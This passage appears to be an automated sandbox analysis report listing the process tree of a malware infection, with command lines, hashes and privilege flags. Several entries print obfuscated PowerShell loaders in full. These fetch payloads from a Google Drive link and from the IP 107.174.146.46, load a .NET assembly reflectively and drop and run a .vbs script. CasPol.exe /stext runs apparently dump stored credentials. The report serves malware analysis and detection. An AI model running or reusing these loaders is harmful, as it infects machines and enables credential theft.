                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSG9NRVsyMV0rJFBzaE9tRVszMF0rJ3gnKSgoJ1prYWltYWdlVXJsID0gUUN4aHQnKyd0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjYnKyd2UzRzVU95Ym5ILXNEdlVoQll3dXIgUUN4O1prYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQ7WmthaW1hZ2VCJysneXRlcyA9IFprYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoWmthaW1hZ2VVcmwpO1prYWltYWdlVGV4dCA9IFtTeXN0JysnZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFprYWltYWdlQnl0ZXMpO1prYXN0YXJ0RmxhZyA9IFFDeDwnKyc8QkFTRTY0X1NUQVJUPj5RQ3g7WmthZW5kRmxhZyA9IFFDeDw8QkFTRTY0X0VORD4+UUN4O1prYXN0YXJ0SW5kZXggPSBaa2FpbWFnZVRleHQuSW5kZXhPZihaa2FzdGFydEZsYWcpO1prYWVuZEluZGV4ID0gWmthaW1hZ2VUZXh0LkluZGV4T2YoWmthZW5kRmxhZycrJyk7Wmthc3RhcnRJbmRleCAtZ2UgMCAtYW4nKydkIFprYWVuZEluZGV4IC1ndCBaJysna2FzdCcrJ2FydEluZGV4O1prYXN0YXJ0SW4nKydkZXggKz0gWmthc3RhcnRGbGFnLkxlbmd0aDtaa2FiYXNlNjRMZW5ndGgnKycgPSBaa2FlbmRJbmRleCAtIFprYXN0YXJ0SW5kZXg7WmthYmFzZTY0Q29tbWFuZCA9IFprYWltYWdlVGV4dC5TdWJzdHJpbicrJ2coWmthc3RhcnRJbmRleCwgJysnWmthYmFzJysnZTY0TGVuZ3RoKTtaa2FiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChaa2FiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgS041IEZvckVhY2gtT2JqZWN0IHsgWmsnKydhXyB9KVstMS4uLShaa2FiJysnYXMnKydlNjRDb21tYW5kLkxlbmd0aCldO1prYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlJysnNjRTdHJpbmcoWmthYmFzZTY0UmV2ZXJzZWQpO1prYWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChaa2Fjb21tYScrJ25kQnl0ZXMpO1prYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoUUN4VkFJUUN4KTtaa2F2YWlNZXRob2QuSW52b2tlKFprYW51bGwsIEAoUUN4dHh0LlJSRlZHR0ZSLzc1LzY0LjY0MS40NzEuNzAxLy86cHR0aFFDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUMnKyd4ZGVzYXRpdmFkb1FDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUN4Q2FzJysnUG9sUUN4LCBRQ3hkZXNhdGl2YWRvUScrJ0N4LCBRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3gxUUN4LFFDeGRlc2F0aXZhZG9RQ3gpKTsnKS5yRVBMYUNlKChbY0hhUl05MCtbY0hhUl0xMDcrW2NIYVJdOTcpLFtzVHJJbmddW2NIYVJdMzYpLnJFUExhQ2UoJ0tONScsW3NUckluZ11bY0hhUl0xMjQpLnJFUExhQ2UoKFtjSGFSXTgxK1tjSGFSXTY3K1tjSGFSXTEyMCksW3NUckluZ11bY0hhUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                                                                                                                                  Imagebase:0x13fa80000
                                                                                                                                                                                                                  File size:443'392 bytes
                                                                                                                                                                                                                  MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                  Target ID:15
                                                                                                                                                                                                                  Start time:00:14:09
                                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHoME[21]+$PshOmE[30]+'x')(('ZkaimageUrl = QCxht'+'tps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur QCx;ZkawebClient = New-Object Sy'+'stem.Net.WebClient;ZkaimageB'+'ytes = ZkawebClient.DownloadData(ZkaimageUrl);ZkaimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(ZkaimageBytes);ZkastartFlag = QCx<'+'<BASE64_START>>QCx;ZkaendFlag = QCx<<BASE64_END>>QCx;ZkastartIndex = ZkaimageText.IndexOf(ZkastartFlag);ZkaendIndex = ZkaimageText.IndexOf(ZkaendFlag'+');ZkastartIndex -ge 0 -an'+'d ZkaendIndex -gt Z'+'kast'+'artIndex;ZkastartIn'+'dex += ZkastartFlag.Length;Zkabase64Length'+' = ZkaendIndex - ZkastartIndex;Zkabase64Command = ZkaimageText.Substrin'+'g(ZkastartIndex, '+'Zkabas'+'e64Length);Zkabase64Reversed = -join (Zkabase64Command.ToCharArray() KN5 ForEach-Object { Zk'+'a_ })[-1..-(Zkab'+'as'+'e64Command.Length)];ZkacommandBytes = [System.'+'Convert]::FromBase'+'64String(Zkabase64Reversed);ZkaloadedAssembly = [System.Reflection.Assembly]::Load(Zkacomma'+'ndBytes);ZkavaiMethod = [dnlib.IO.Home].Ge'+'tMethod(QCxVAIQCx);ZkavaiMethod.Invoke(Zkanull, @(QCxtxt.RRFVGGFR/75/64.641.471.701//:ptthQCx, QCxdesativadoQCx, QC'+'xdesativadoQCx, QCxdesativadoQCx, QCxCas'+'PolQCx, QCxdesativadoQ'+'Cx, QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCx1QCx,QCxdesativadoQCx));').rEPLaCe(([cHaR]90+[cHaR]107+[cHaR]97),[sTrIng][cHaR]36).rEPLaCe('KN5',[sTrIng][cHaR]124).rEPLaCe(([cHaR]81+[cHaR]67+[cHaR]120),[sTrIng][cHaR]39))"
                                                                                                                                                                                                                  Imagebase:0x13fa80000
                                                                                                                                                                                                                  File size:443'392 bytes
                                                                                                                                                                                                                  MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:16
                                                                                                                                                                                                                  Start time:00:14:15
                                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                                  Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                                                                                                                                                                  Imagebase:0x13f6b0000
                                                                                                                                                                                                                  File size:13'824 bytes
                                                                                                                                                                                                                  MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:18
                                                                                                                                                                                                                  Start time:00:14:20
                                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:"C:\Windows\SYStEM32\windOWSpOWErsHeLL\V1.0\PoWERShelL.exe" "PoweRshElL.EXe -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE ; IeX($(Iex('[SYSTem.texT.enCoDIng]'+[chAR]0X3a+[cHAR]58+'UTf8.gETsTRInG([sYSTEM.CONverT]'+[cHAr]0x3a+[Char]58+'fRoMBASe64STrIng('+[cHaR]34+'JFhETklVVk0yVTJQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlRmlOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0xBYWd3b3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHUmosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd3cCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdlcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJiZUtsQXF0QWEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB1TlFCdkdFdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWEROSVVWTTJVMlA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjE0Ni40Ni81Ny9waWN0dXJld2l0aGdyZWF0bmV3c3dpdGhnb29kdGhpbmdzb25iZXN0cGxhY2UudElGIiwiJEVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3NvbmJlLnZicyIsMCwwKTtTVEFydC1zbGVlcCgzKTtTdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nc29uYmUudmJzIg=='+[chAr]34+'))')))"
                                                                                                                                                                                                                  Imagebase:0x13fa80000
                                                                                                                                                                                                                  File size:443'392 bytes
                                                                                                                                                                                                                  MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:20
                                                                                                                                                                                                                  Start time:00:14:20
                                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE
                                                                                                                                                                                                                  Imagebase:0x13fa80000
                                                                                                                                                                                                                  File size:443'392 bytes
                                                                                                                                                                                                                  MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:21
                                                                                                                                                                                                                  Start time:00:14:23
                                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\revod450\revod450.cmdline"
                                                                                                                                                                                                                  Imagebase:0x13f3d0000
                                                                                                                                                                                                                  File size:2'758'280 bytes
                                                                                                                                                                                                                  MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:22
                                                                                                                                                                                                                  Start time:00:14:23
                                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC85F.tmp" "c:\Users\user\AppData\Local\Temp\revod450\CSCA06B8A6F8CBF4D28B1CF456BD67905.TMP"
                                                                                                                                                                                                                  Imagebase:0x13f200000
                                                                                                                                                                                                                  File size:52'744 bytes
                                                                                                                                                                                                                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:24
                                                                                                                                                                                                                  Start time:00:14:28
                                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgreatnewswithgoodthingsonbe.vbs"
                                                                                                                                                                                                                  Imagebase:0xff760000
                                                                                                                                                                                                                  File size:168'960 bytes
                                                                                                                                                                                                                  MD5 hash:045451FA238A75305CC26AC982472367
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:25
                                                                                                                                                                                                                  Start time:00:14:29
                                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSG9NRVsyMV0rJFBzaE9tRVszMF0rJ3gnKSgoJ1prYWltYWdlVXJsID0gUUN4aHQnKyd0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjYnKyd2UzRzVU95Ym5ILXNEdlVoQll3dXIgUUN4O1prYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQ7WmthaW1hZ2VCJysneXRlcyA9IFprYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoWmthaW1hZ2VVcmwpO1prYWltYWdlVGV4dCA9IFtTeXN0JysnZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFprYWltYWdlQnl0ZXMpO1prYXN0YXJ0RmxhZyA9IFFDeDwnKyc8QkFTRTY0X1NUQVJUPj5RQ3g7WmthZW5kRmxhZyA9IFFDeDw8QkFTRTY0X0VORD4+UUN4O1prYXN0YXJ0SW5kZXggPSBaa2FpbWFnZVRleHQuSW5kZXhPZihaa2FzdGFydEZsYWcpO1prYWVuZEluZGV4ID0gWmthaW1hZ2VUZXh0LkluZGV4T2YoWmthZW5kRmxhZycrJyk7Wmthc3RhcnRJbmRleCAtZ2UgMCAtYW4nKydkIFprYWVuZEluZGV4IC1ndCBaJysna2FzdCcrJ2FydEluZGV4O1prYXN0YXJ0SW4nKydkZXggKz0gWmthc3RhcnRGbGFnLkxlbmd0aDtaa2FiYXNlNjRMZW5ndGgnKycgPSBaa2FlbmRJbmRleCAtIFprYXN0YXJ0SW5kZXg7WmthYmFzZTY0Q29tbWFuZCA9IFprYWltYWdlVGV4dC5TdWJzdHJpbicrJ2coWmthc3RhcnRJbmRleCwgJysnWmthYmFzJysnZTY0TGVuZ3RoKTtaa2FiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChaa2FiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgS041IEZvckVhY2gtT2JqZWN0IHsgWmsnKydhXyB9KVstMS4uLShaa2FiJysnYXMnKydlNjRDb21tYW5kLkxlbmd0aCldO1prYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlJysnNjRTdHJpbmcoWmthYmFzZTY0UmV2ZXJzZWQpO1prYWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChaa2Fjb21tYScrJ25kQnl0ZXMpO1prYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoUUN4VkFJUUN4KTtaa2F2YWlNZXRob2QuSW52b2tlKFprYW51bGwsIEAoUUN4dHh0LlJSRlZHR0ZSLzc1LzY0LjY0MS40NzEuNzAxLy86cHR0aFFDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUMnKyd4ZGVzYXRpdmFkb1FDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUN4Q2FzJysnUG9sUUN4LCBRQ3hkZXNhdGl2YWRvUScrJ0N4LCBRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3gxUUN4LFFDeGRlc2F0aXZhZG9RQ3gpKTsnKS5yRVBMYUNlKChbY0hhUl05MCtbY0hhUl0xMDcrW2NIYVJdOTcpLFtzVHJJbmddW2NIYVJdMzYpLnJFUExhQ2UoJ0tONScsW3NUckluZ11bY0hhUl0xMjQpLnJFUExhQ2UoKFtjSGFSXTgxK1tjSGFSXTY3K1tjSGFSXTEyMCksW3NUckluZ11bY0hhUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                                                                                                                                  Imagebase:0x13fa80000
                                                                                                                                                                                                                  File size:443'392 bytes
                                                                                                                                                                                                                  MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                  Target ID:27
                                                                                                                                                                                                                  Start time:00:14:30
                                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHoME[21]+$PshOmE[30]+'x')(('ZkaimageUrl = QCxht'+'tps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur QCx;ZkawebClient = New-Object Sy'+'stem.Net.WebClient;ZkaimageB'+'ytes = ZkawebClient.DownloadData(ZkaimageUrl);ZkaimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(ZkaimageBytes);ZkastartFlag = QCx<'+'<BASE64_START>>QCx;ZkaendFlag = QCx<<BASE64_END>>QCx;ZkastartIndex = ZkaimageText.IndexOf(ZkastartFlag);ZkaendIndex = ZkaimageText.IndexOf(ZkaendFlag'+');ZkastartIndex -ge 0 -an'+'d ZkaendIndex -gt Z'+'kast'+'artIndex;ZkastartIn'+'dex += ZkastartFlag.Length;Zkabase64Length'+' = ZkaendIndex - ZkastartIndex;Zkabase64Command = ZkaimageText.Substrin'+'g(ZkastartIndex, '+'Zkabas'+'e64Length);Zkabase64Reversed = -join (Zkabase64Command.ToCharArray() KN5 ForEach-Object { Zk'+'a_ })[-1..-(Zkab'+'as'+'e64Command.Length)];ZkacommandBytes = [System.'+'Convert]::FromBase'+'64String(Zkabase64Reversed);ZkaloadedAssembly = [System.Reflection.Assembly]::Load(Zkacomma'+'ndBytes);ZkavaiMethod = [dnlib.IO.Home].Ge'+'tMethod(QCxVAIQCx);ZkavaiMethod.Invoke(Zkanull, @(QCxtxt.RRFVGGFR/75/64.641.471.701//:ptthQCx, QCxdesativadoQCx, QC'+'xdesativadoQCx, QCxdesativadoQCx, QCxCas'+'PolQCx, QCxdesativadoQ'+'Cx, QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCx1QCx,QCxdesativadoQCx));').rEPLaCe(([cHaR]90+[cHaR]107+[cHaR]97),[sTrIng][cHaR]36).rEPLaCe('KN5',[sTrIng][cHaR]124).rEPLaCe(([cHaR]81+[cHaR]67+[cHaR]120),[sTrIng][cHaR]39))"
                                                                                                                                                                                                                  Imagebase:0x13fa80000
                                                                                                                                                                                                                  File size:443'392 bytes
                                                                                                                                                                                                                  MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:28
                                                                                                                                                                                                                  Start time:00:14:33
                                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                                                                                                                                                                  Imagebase:0x280000
                                                                                                                                                                                                                  File size:107'704 bytes
                                                                                                                                                                                                                  MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:29
                                                                                                                                                                                                                  Start time:00:14:33
                                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                                                                                                                                                                  Imagebase:0x280000
                                                                                                                                                                                                                  File size:107'704 bytes
                                                                                                                                                                                                                  MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                  Target ID:31
                                                                                                                                                                                                                  Start time:00:14:37
                                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ccpqkvncszlcdyhupbgkfnqpbhfycgj"
                                                                                                                                                                                                                  Imagebase:0x280000
                                                                                                                                                                                                                  File size:107'704 bytes
                                                                                                                                                                                                                  MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:32
                                                                                                                                                                                                                  Start time:00:14:38
                                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
                                                                                                                                                                                                                  Imagebase:0x280000
                                                                                                                                                                                                                  File size:107'704 bytes
                                                                                                                                                                                                                  MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:33
                                                                                                                                                                                                                  Start time:00:14:38
                                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
                                                                                                                                                                                                                  Imagebase:0x280000
                                                                                                                                                                                                                  File size:107'704 bytes
                                                                                                                                                                                                                  MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:34
                                                                                                                                                                                                                  Start time:00:14:39
                                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
                                                                                                                                                                                                                  Imagebase:0x280000
                                                                                                                                                                                                                  File size:107'704 bytes
                                                                                                                                                                                                                  MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:35
                                                                                                                                                                                                                  Start time:00:14:39
                                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
                                                                                                                                                                                                                  Imagebase:0x280000
                                                                                                                                                                                                                  File size:107'704 bytes
                                                                                                                                                                                                                  MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:36
                                                                                                                                                                                                                  Start time:00:14:40
                                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
                                                                                                                                                                                                                  Imagebase:0x280000
                                                                                                                                                                                                                  File size:107'704 bytes
                                                                                                                                                                                                                  MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                                                                                                                                  Has elevated privileges:true
